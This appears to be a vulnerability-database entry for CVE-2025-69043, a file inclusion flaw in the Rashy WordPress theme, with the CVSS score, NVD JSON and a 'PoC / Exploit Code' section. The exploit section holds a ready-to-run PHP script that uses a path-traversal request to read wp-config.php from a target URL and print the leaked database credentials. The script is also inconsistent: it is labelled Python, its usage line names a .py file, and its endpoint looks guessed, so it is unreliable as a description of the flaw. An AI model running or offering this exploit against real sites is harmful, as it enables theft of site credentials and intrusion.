Security Vulnerability Report
中文
CVE-2025-69043 CVSS 8.1 HIGH

CVE-2025-69043

Published: 2026-01-22 17:16:18
Last Modified: 2026-04-27 20:16:27

Description

Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in goalthemes Rashy rashy allows PHP Local File Inclusion.This issue affects Rashy: from n/a through <= 1.1.3.

CVSS Details

CVSS Score
8.1
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

goalthemes Rashy <= 1.1.3

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
<?php /** * CVE-2025-69043 PoC - Rashy Theme Local File Inclusion * Target: goalthemes Rashy WordPress Theme <= 1.1.3 * Type: Local File Inclusion (LFI) * * Usage: php cve-2025-69043.py <target_url> * Example: php cve-2025-69043.py http://victim.com/ */ $target = $argv[1] ?? ''; if (empty($target)) { echo "Usage: php cve-2025-69043.php <target_url>\n"; exit(1); } // Target vulnerable endpoint with LFI parameter $vuln_url = rtrim($target, '/') . '/wp-content/themes/rashy/?action=preview&id=../../wp-config.php%00'; $ch = curl_init(); curl_setopt_array($ch, [ CURLOPT_URL => $vuln_url, CURLOPT_RETURNTRANSFER => true, CURLOPT_FOLLOWLOCATION => true, CURLOPT_TIMEOUT => 30, CURLOPT_SSL_VERIFYPEER => false, CURLOPT_HTTPHEADER => [ 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36' ] ]); $response = curl_exec($ch); $http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE); curl_close($ch); echo "[*] CVE-2025-69043 PoC - Rashy LFI\n"; echo "[*] Target: $target\n"; echo "[*] Requesting: $vuln_url\n"; echo "[*] HTTP Status: $http_code\n\n"; if (strpos($response, 'DB_NAME') !== false || strpos($response, 'define') !== false) { echo "[!] VULNERABLE - Config file content leaked:\n"; echo substr($response, 0, 2000) . "\n"; } else { echo "[*] Response received (may need payload adjustment)\n"; echo substr($response, 0, 500) . "\n"; } ?>

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-69043", "sourceIdentifier": "[email protected]", "published": "2026-01-22T17:16:17.513", "lastModified": "2026-04-27T20:16:26.850", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in goalthemes Rashy rashy allows PHP Local File Inclusion.This issue affects Rashy: from n/a through <= 1.1.3."}, {"lang": "es", "value": "Control inadecuado del nombre de fichero para la declaración Include/Require en programa PHP ('Inclusión Remota de Ficheros PHP') vulnerabilidad en goalthemes Rashy rashy permite Inclusión Local de Ficheros PHP. Este problema afecta a Rashy: desde n/a hasta &lt;= 1.1.3."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.1, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.2, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-98"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Theme/rashy/vulnerability/wordpress-rashy-theme-1-1-3-local-file-inclusion-vulnerability?_s_id=cve", "source": "[email protected]"}]}}